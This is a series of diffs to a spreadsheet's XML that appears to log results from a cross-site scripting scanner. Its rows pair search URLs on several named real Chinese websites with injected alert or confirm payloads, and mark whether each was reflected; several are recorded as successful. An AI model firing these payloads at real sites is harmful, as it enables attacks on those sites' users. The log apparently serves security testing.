--- a/ChineseLanguage/file.xlsx
+++ b/ChineseLanguage/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D15"/>
+  <dimension ref="A1:D35"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="C9" sqref="C9"/>
@@ -645,7 +645,436 @@
           <t>TRUE</t>
         </is>
       </c>
-      <c r="D15" t="inlineStr"/>
+    </row>
+    <row r="16">
+      <c r="A16" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B16" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C16" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D16" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta name="keywords" content="" onmouseover="alert`1`," onmouseover="alert`1`报价," onmouseover="alert`1`最新报价," onmouseover="alert`1`大全," onmouseover="alert`1`报价大全" /&gt; , &lt;meta name="description" content="天极产品库_wap版提供" onmouseover="alert`1`最新报价信息,包括" onmouseover="alert`1`价格,参数,评测,图片,论坛等详细内容." /&gt; , &lt;input type="text" id = "textin" value="" onmouseover="alert`1`" name="keyword" class="wapin" onClick="this.value='';"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="17">
+      <c r="A17" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B17" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C17" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D17" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta name="keywords" content="" onmouseover="alert`1`," onmouseover="alert`1`报价," onmouseover="alert`1`最新报价," onmouseover="alert`1`大全," onmouseover="alert`1`报价大全" /&gt; , &lt;meta name="description" content="天极产品库_wap版提供" onmouseover="alert`1`最新报价信息,包括" onmouseover="alert`1`价格,参数,评测,图片,论坛等详细内容." /&gt; , &lt;input type="text" id = "textin" value="" onmouseover="alert`1`" name="keyword" class="wapin" onClick="this.value='';"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="18">
+      <c r="A18" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B18" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C18" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D18" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta name="keywords" content="" onmouseover="alert`1`," onmouseover="alert`1`报价," onmouseover="alert`1`最新报价," onmouseover="alert`1`大全," onmouseover="alert`1`报价大全" /&gt; , &lt;meta name="description" content="天极产品库_wap版提供" onmouseover="alert`1`最新报价信息,包括" onmouseover="alert`1`价格,参数,评测,图片,论坛等详细内容." /&gt; , &lt;input type="text" id = "textin" value="" onmouseover="alert`1`" name="keyword" class="wapin" onClick="this.value='';"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B19" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D19" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror='alert`1`'&gt;最新报价-&lt;img src=x onerror='alert`1`'&gt;大全-天极产品库-wap版&lt;/title&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="20">
+      <c r="A20" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B20" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C20" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D20" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;img src=x onerror="alert`1`"&gt;最新报价-&lt;img src=x onerror="alert`1`"&gt;大全-天极产品库-wap版&lt;/title&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="21">
+      <c r="A21" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B21" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C21" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="22">
+      <c r="A22" t="inlineStr">
+        <is>
+          <t>http://pinterface.tianjimedia.com/front/wap/searchresult.jsp?keyword=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B22" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C22" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="23">
+      <c r="A23" t="inlineStr">
+        <is>
+          <t>https://so.csdn.net/so/search/s.do?q=' onmouseover='alert`1`&amp;t=&amp;u=</t>
+        </is>
+      </c>
+      <c r="B23" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C23" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D23" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta name="csdn-baidu-search" content='{"keyword":"' onmouseover='alert`1`"}'/&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="24">
+      <c r="A24" t="inlineStr">
+        <is>
+          <t>https://so.csdn.net/so/search/s.do?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;t=&amp;u=</t>
+        </is>
+      </c>
+      <c r="B24" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C24" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="25">
+      <c r="A25" t="inlineStr">
+        <is>
+          <t>https://search.bilibili.com/all?keyword='; confirm`1`; '&amp;from_source=nav_search_new</t>
+        </is>
+      </c>
+      <c r="B25" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C25" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D25" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="26">
+      <c r="A26" t="inlineStr">
+        <is>
+          <t>http://so.jrj.com.cn/cse/search?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;s=5981575158355482147&amp;nsid=1</t>
+        </is>
+      </c>
+      <c r="B26" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C26" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D26" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="27">
+      <c r="A27" t="inlineStr">
+        <is>
+          <t>http://so.jrj.com.cn/cse/search?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;s=5981575158355482147&amp;nsid=1</t>
+        </is>
+      </c>
+      <c r="B27" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C27" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D27" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="28">
+      <c r="A28" t="inlineStr">
+        <is>
+          <t>http://so.jrj.com.cn/cse/search?q=&amp;s=5981575158355482147&amp;nsid=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B28" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C28" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D28" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="29">
+      <c r="A29" t="inlineStr">
+        <is>
+          <t>http://so.jrj.com.cn/cse/search?q=&amp;s=5981575158355482147&amp;nsid=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B29" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C29" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D29" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="30">
+      <c r="A30" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B30" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C30" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D30" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="31">
+      <c r="A31" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B31" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C31" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="32">
+      <c r="A32" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B32" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C32" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D32" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="33">
+      <c r="A33" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B33" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C33" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D33" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="34">
+      <c r="A34" t="inlineStr">
+        <is>
+          <t>https://so.csdn.net/so/search/s.do?q=' onmouseover='alert`1`&amp;t=&amp;u=</t>
+        </is>
+      </c>
+      <c r="B34" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;meta name="csdn-baidu-search" content='{"keyword":"' onmouseover='alert`1`"}'/&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="35">
+      <c r="A35" t="inlineStr">
+        <is>
+          <t>https://so.csdn.net/so/search/s.do?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;t=&amp;u=</t>
+        </is>
+      </c>
+      <c r="B35" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C35" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>

--- a/ChineseLanguage/file.xlsx
+++ b/ChineseLanguage/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D35"/>
+  <dimension ref="A1:D64"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="C9" sqref="C9"/>
@@ -1076,6 +1076,619 @@
         </is>
       </c>
     </row>
+    <row r="36">
+      <c r="A36" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B36" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="37">
+      <c r="A37" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B37" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C37" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="38">
+      <c r="A38" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B38" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C38" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="39">
+      <c r="A39" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B39" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C39" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D39" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="40">
+      <c r="A40" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B40" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C40" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="41">
+      <c r="A41" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B41" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C41" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="42">
+      <c r="A42" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B42" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C42" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D42" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="43">
+      <c r="A43" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B43" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C43" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="44">
+      <c r="A44" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B44" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C44" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D44" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="45">
+      <c r="A45" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B45" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C45" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D45" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="46">
+      <c r="A46" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B46" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C46" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D46" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="47">
+      <c r="A47" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B47" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C47" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D47" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="48">
+      <c r="A48" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B48" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C48" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D48" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="49">
+      <c r="A49" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B49" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C49" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D49" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="50">
+      <c r="A50" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B50" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C50" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D50" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="51">
+      <c r="A51" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B51" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C51" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D51" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="52">
+      <c r="A52" t="inlineStr">
+        <is>
+          <t>http://tw.gigacircle.com/category.html?group=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B52" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C52" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="53">
+      <c r="A53" t="inlineStr">
+        <is>
+          <t>http://tw.gigacircle.com/category.html?group=' onmouseover='alert`1`</t>
+        </is>
+      </c>
+      <c r="B53" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C53" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="54">
+      <c r="A54" t="inlineStr">
+        <is>
+          <t>http://tw.gigacircle.com/category.html?group=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B54" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C54" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="55">
+      <c r="A55" t="inlineStr">
+        <is>
+          <t>http://tw.gigacircle.com/category.html?group=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B55" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C55" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="56">
+      <c r="A56" t="inlineStr">
+        <is>
+          <t>http://tw.gigacircle.com/category.html?group=" onmouseover="alert`1`</t>
+        </is>
+      </c>
+      <c r="B56" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C56" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="57">
+      <c r="A57" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B57" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C57" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D57" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="58">
+      <c r="A58" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B58" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C58" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D58" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="59">
+      <c r="A59" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B59" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C59" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D59" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="60">
+      <c r="A60" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B60" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C60" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D60" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="61">
+      <c r="A61" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B61" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C61" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D61" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="62">
+      <c r="A62" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B62" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C62" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D62" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="63">
+      <c r="A63" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B63" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C63" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D63" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="64">
+      <c r="A64" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B64" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C64" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D64" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/ChineseLanguage/file.xlsx
+++ b/ChineseLanguage/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D64"/>
+  <dimension ref="A1:D72"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="C9" sqref="C9"/>
@@ -1689,6 +1689,182 @@
         </is>
       </c>
     </row>
+    <row r="65">
+      <c r="A65" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B65" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C65" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D65" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="66">
+      <c r="A66" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B66" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C66" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D66" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="67">
+      <c r="A67" t="inlineStr">
+        <is>
